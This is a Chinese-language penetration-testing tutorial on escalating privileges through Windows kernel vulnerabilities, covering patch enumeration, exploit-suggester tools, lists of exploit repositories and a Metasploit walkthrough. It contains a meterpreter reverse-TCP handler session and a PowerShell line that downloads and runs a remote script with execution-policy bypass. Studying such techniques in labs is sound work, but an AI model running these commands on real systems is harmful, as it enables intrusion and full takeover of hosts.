权限提升-Windows内核提权
目录- 权限提升-Windows内核提权
- 本节知识点
- 系统内核溢出漏洞提权概述
- 内核溢出提权步骤
- 补丁对比法
- 1.手动查找系统补丁
- 2.对比查找系统潜在漏洞
- 3.提权大集合
- 项目地址:https://github.com/lyshark/Windows-exploits
- 项目地址:https://github.com/SecWiki/windows-kernel-exploits
- 项目地址:https://github.com/klsfct/getshell
- 项目地址:https://github.com/k8gege/Ladon
- 项目地址:https://github.com/Ascotbe/KernelHub
- 项目地址:https://github.com/nomi-sec/PoC-in-GitHub
- 项目地址:https://cve.mitre.org/index.html
- 项目地址:https://github.com/offensive-security/exploitdb exploit-db源码仓库
- MSF半自动利用
- CS全自动提权
本节知识点
- 了解Windows内核提权
- 掌握Windows内核提权命令
- 掌握Windows内核提权操作步骤
- 掌握手动内核提权操作
- 掌握MSF半手动提权操作
- 掌握CS全自动揽权操作
系统内核溢出漏洞提权概述
溢出漏洞是一种计算机程序的可更正性缺陷。溢出漏洞的全名:缓冲区溢出漏洞。因为它是在程序执行的时候在缓冲区执行的错误代码,所以叫缓冲区溢出漏洞。缓冲溢出是最常见的内存错误之一,也是攻击者入侵系统时所用到的最强大、最经典的一类漏洞利用方式。成功地利用缓冲区溢出漏洞可以修改内存中变量的值,甚至可以劫持进程,执行恶意代码,最终获得主机的控制权。
利用Windows系统内核溢出漏洞提权是一种很通用的提权方法,攻击者通常可以使用该方法绕过系统中的所有安全限制。攻击者利用该漏洞的关键是目标系统有没有及时安装补丁,如果目标系统没有安装某一漏洞的补丁且存在该漏洞的话,攻击者就会向目标系统上传本地溢出程序,溢出Administrator权限。
内核溢出提权步骤
- 信息收集-(系统版本-系统架构-补丁安装情况-是否存在杀软-网络拓扑)
- 根据信息收集进行提权EXP筛选
- 上传EXP执行提权
补丁对比法
1.手动查找系统补丁
获取目标主机的一个普通用户的shell后,执行如下命令,查看目标系统上安装了那些补丁:
systeminfo
或
wmic qfe get caption,description,hotfixid,installedon
可以看到系统就装了这几个补丁。攻击者会通过没有列出的补丁号,寻找相应的提权EXP,Windows不同系统提权的漏洞和相应的补丁请见:点我呀。
2.对比查找系统潜在漏洞
项目一:Windows Exploit Suggester
下载地址:https://github.com/GDSSecurity/Windows-Exploit-Suggester
该工具可以将系统中已经安装的补丁程序与微软的漏洞数据库进行比较,并可以识别可能导致权限提升的漏洞,而且其只需要我们给出目标系统的信息即可。
使用如下:
首先更新漏洞数据库,会生成一个xls的文件,如下 2020-08-20-mssb.xls
python2 windows-exploit-suggester.py --update
或./windows-expoit-suggester.py --update
然后执行如下命令,查看目标主机系统信息,保存为sysinfo.txt文件:
systeminfo > sysinfo.txt
最后,运行如下命令,查看该系统是否存在可利用的提权漏洞:
python2 windows-exploit-suggester.py -d 2020-08-20-mssb.xls -i sysinfo.txt
如上图,执行后,给出了一堆目标系统存在的漏洞
项目二.WindowsVulnScan
https://github.com/chroblert/WindowsVulnScan
环境Win2016
上传KBCollect.ps1至系统,调用PowerShell收集信息
当前目录下的KB.json文件为搜集结果
使用-u参数先更新下补丁,接着比对当前补丁信息
项目三 wesng
https://github.com/vulmon/Vulmap
3.提权大集合
Windows 下的提权大合集
项目地址:https://github.com/lyshark/Windows-exploits
项目地址:https://github.com/SecWiki/windows-kernel-exploits
项目地址:https://github.com/klsfct/getshell
项目地址:https://github.com/k8gege/Ladon
项目地址:https://github.com/Ascotbe/KernelHub
项目地址:https://github.com/nomi-sec/PoC-in-GitHub
项目地址:https://cve.mitre.org/index.html
项目地址:https://github.com/offensive-security/exploitdb exploit-db源码仓库
MSF半自动利用
方法一:local_exploit_suggester 模块
Metasploit内置模块提供了各种可用于提权的local exploits,并会基于架构,平台(即运行的操作系统),会话类型和所需默认选项提供建议。这极大的节省了我们的时间,省去了我们手动搜索local exploits的麻烦。
使用如下,假设我们已经获得了目标主机的一个session:
bg
use post/multi/recon/local_exploit_suggester
set session 1
exploit
(kali㉿kali)-[~/Desktop]
└─$ msfconsole -q
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lport 1123
lport => 1123
msf6 exploit(multi/handler) > set lhost eth0
lhost => eth0
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.3.180:1123
[*] Sending stage (200774 bytes) to 192.168.3.179
[*] Meterpreter session 1 opened (192.168.3.180:1123 -> 192.168.3.179:51121) at 2023-08-12 12:23:25 -0400
meterpreter > bg
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > use post/multi/recon/local_exploit_suggester
msf6 post(multi/recon/local_exploit_suggester) > options
Module options (post/multi/recon/local_exploit_suggester):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on
SHOWDESCRIPTION false yes Displays a detailed description for the available exploits
View the full module info with the info, or info -d command.
msf6 post(multi/recon/local_exploit_suggester) > set session 1
session => 1
msf6 post(multi/recon/local_exploit_suggester) > exploit
[*] 192.168.3.179 - Collecting local exploits for x64/windows...
[*] 192.168.3.179 - 186 exploit checks are being tried...
[+] 192.168.3.179 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
[+] 192.168.3.179 - exploit/windows/local/cve_2019_1458_wizardopium: The target appears to be vulnerable.
[+] 192.168.3.179 - exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move: The service is running, but could not be validated. Vulnerable Windows 7/Windows Server 2008 R2 build detected!
[+] 192.168.3.179 - exploit/windows/local/cve_2020_1054_drawiconex_lpe: The target appears to be vulnerable.
[+] 192.168.3.179 - exploit/windows/local/cve_2021_40449: The service is running, but could not be validated. Windows 7/Windows Server 2008 R2 build detected!
[+] 192.168.3.179 - exploit/windows/local/ms10_092_schelevator: The service is running, but could not be validated.
[+] 192.168.3.179 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 192.168.3.179 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 192.168.3.179 - exploit/windows/local/ms15_078_atmfd_bof: The service is running, but could not be validated.
[+] 192.168.3.179 - exploit/windows/local/ms16_014_wmi_recv_notif: The target appears to be vulnerable.
[+] 192.168.3.179 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.
[+] 192.168.3.179 - exploit/windows/local/ms16_075_reflection_juicy: The target appears to be vulnerable.
[+] 192.168.3.179 - exploit/windows/local/tokenmagic: The target appears to be vulnerable.
[*] Running check method for exploit 43 / 43
[*] 192.168.3.179 - Valid modules for session 1:
============================
# Name Potentially Vulnerable? Check Result
- ---- ----------------------- ------------
1 exploit/windows/local/bypassuac_eventvwr Yes The target appears to be vulnerable.
2 exploit/windows/local/cve_2019_1458_wizardopium Yes The target appears to be vulnerable.
3 exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move Yes The service is running, but could not be validated. Vulnerable Windows 7/Windows Server 2008 R2 build detected!
4 exploit/windows/local/cve_2020_1054_drawiconex_lpe Yes The target appears to be vulnerable.
5 exploit/windows/local/cve_2021_40449 Yes The service is running, but could not be validated. Windows 7/Windows Server 2008 R2 build detected!
6 exploit/windows/local/ms10_092_schelevator Yes The service is running, but could not be validated.
7 exploit/windows/local/ms14_058_track_popup_menu Yes The target appears to be vulnerable.
8 exploit/windows/local/ms15_051_client_copy_image Yes The target appears to be vulnerable.
9 exploit/windows/local/ms15_078_atmfd_bof Yes The service is running, but could not be validated.
10 exploit/windows/local/ms16_014_wmi_recv_notif Yes The target appears to be vulnerable.
11 exploit/windows/local/ms16_075_reflection Yes The target appears to be vulnerable.
12 exploit/windows/local/ms16_075_reflection_juicy Yes The target appears to be vulnerable.
13 exploit/windows/local/tokenmagic Yes The target appears to be vulnerable.
14 exploit/windows/local/agnitum_outpost_acs No The target is not exploitable.
15 exploit/windows/local/always_install_elevated No The target is not exploitable.
16 exploit/windows/local/bits_ntlm_token_impersonation No The target is not exploitable.
17 exploit/windows/local/bypassuac_dotnet_profiler No The target is not exploitable.
18 exploit/windows/local/bypassuac_fodhelper No The target is not exploitable.
19 exploit/windows/local/bypassuac_sdclt No The target is not exploitable.
20 exploit/windows/local/bypassuac_sluihijack No The target is not exploitable.
21 exploit/windows/local/canon_driver_privesc No The target is not exploitable. No Canon TR150 driver directory found
22 exploit/windows/local/capcom_sys_exec No The target is not exploitable.
23 exploit/windows/local/cve_2020_0796_smbghost No The target is not exploitable.
24 exploit/windows/local/cve_2020_1048_printerdemon No The target is not exploitable.
25 exploit/windows/local/cve_2020_1313_system_orchestrator No The target is not exploitable.
26 exploit/windows/local/cve_2020_1337_printerdemon No The target is not exploitable.
27 exploit/windows/local/cve_2020_17136 No The target is not exploitable. The build number of the target machine does not appear to be a vulnerable version!
28 exploit/windows/local/cve_2021_21551_dbutil_memmove No The target is not exploitable.
29 exploit/windows/local/cve_2022_21882_win32k No The target is not exploitable.
30 exploit/windows/local/cve_2022_21999_spoolfool_privesc No The target is not exploitable. Windows 7 is technically vulnerable, though it requires a reboot.
31 exploit/windows/local/cve_2022_3699_lenovo_diagnostics_driver No The target is not exploitable.
32 exploit/windows/local/cve_2023_21768_afd_lpe No The target is not exploitable. The exploit only supports Windows 11 22H2
33 exploit/windows/local/gog_galaxyclientservice_privesc No The target is not exploitable. Galaxy Client Service not found
34 exploit/windows/local/ikeext_service No The check raised an exception.
35 exploit/windows/local/lexmark_driver_privesc No The target is not exploitable. No Lexmark print drivers in the driver store
36 exploit/windows/local/ms16_032_secondary_logon_handle_privesc No The target is not exploitable.
37 exploit/windows/local/ntapphelpcachecontrol No The check raised an exception.
38 exploit/windows/local/nvidia_nvsvc No The check raised an exception.
39 exploit/windows/local/panda_psevents No The target is not exploitable.
40 exploit/windows/local/ricoh_driver_privesc No The target is not exploitable. No Ricoh driver directory found
41 exploit/windows/local/srclient_dll_hijacking No The target is not exploitable. Target is not Windows Server 2012.
42 exploit/windows/local/virtual_box_opengl_escape No The target is not exploitable.
43 exploit/windows/local/webexec No The check raised an exception.
[*] Post module execution completed
msf6 post(multi/recon/local_exploit_suggester) >
如上图,该模块快速识别并列出了系统中可能被利用的漏洞,十分方便。但虽然如此,也并非所有列出的local exploits都可用。
第一个尝试失败
使用第二个利用成功
方法二:enum_patches 模块
会用metasploit中的post/windows/gather/enum_patches模块可以根据漏洞编号快速找出系统中缺少的补丁。使用如下:
use post/windows/gather/enum_patches
set session 1
exploit
MSF 自定义模块
在实际的查找潜在漏洞的过程中,建议手动和自动双管齐下。
下载地址:https://github.com/h1ck0r/Sherlock
该脚本可以快速的查找出可能用于本地权限提升的漏洞。使用如下:
powershell -exec bypass -c IEX(New-Object Net.WebClient).DownloadString('http://192.168.3.151:8092/Sherlock.ps1'); // 远程执行
Import-Module 目录\Sherlock.ps1 本地执行
Find-AllVulns // 调用脚本后,执行搜索命令
但在此之前我们要解决Powershell中的执行策略(Execution Policy)
因为Powershell默认的执行策略是Restricted,即可以运行单条命令,但不能运行脚本,包括格式和配置文件 (.ps1xml)、模块脚本文件 (.psm1) 和 Windows PowerShell 配置文件 (.ps1)、以及.bat文件。 解决方案是把执行策略改得宽松一点,比如RemoteSigned或者Unrestricted。在Powershell中运行以下命令即可: Set-ExecutionPolicy RemoteSigned 或 Set-ExecutionPolicy Unrestricted或-ExecutionPolicy RemoteSigned
选择漏洞并利用
以上方Sherlock结果为例,MS14-058
我们选择第一个可以利用的结果
结果当中给了我们exploit-db的利用脚本
该脚本可以下载,是rb脚本,所以我们需要将该脚本放置进MSF的exploit目录下方去,然后重新加载MSF, 完整目录应该为:/usr/share/metasploit-framework/modules/exploits
当前下载的脚本为35301.rb,在此我新建一个叫35301的目录,并将35301.rb放置进该目录,重新启动MSF时会提示加载了新的模块
在使用这个做测试时发现了几个问题第一是我们的payload默认情况工作在x86上,利用的时候会报错,提示架构不符,但架构匹配的情况下依然是没有获取到shell
Github搜索对应提权程序
提权成功
查找了目标机器上的补丁并确定存在漏洞后,我们就可以像目标机器上传本地溢出程序,并执行。这里,我们选择的是CVE-2018-8120。
漏洞利用程序可以从以下几个地址中下载:(里面附有使用说明)
- Windows 下的提权大合集:https://github.com/lyshark/Windows-exploits
- Windows内核溢出漏洞提权大全:https://github.com/SecWiki/windows-kernel-exploits
- 各大平台提权工具:https://github.com/klsfct/getshell
执行:
如上图,再执行提权程序之前,为普通用户whoami权限,执行后为system权限。msfconsole上完整操作如下:
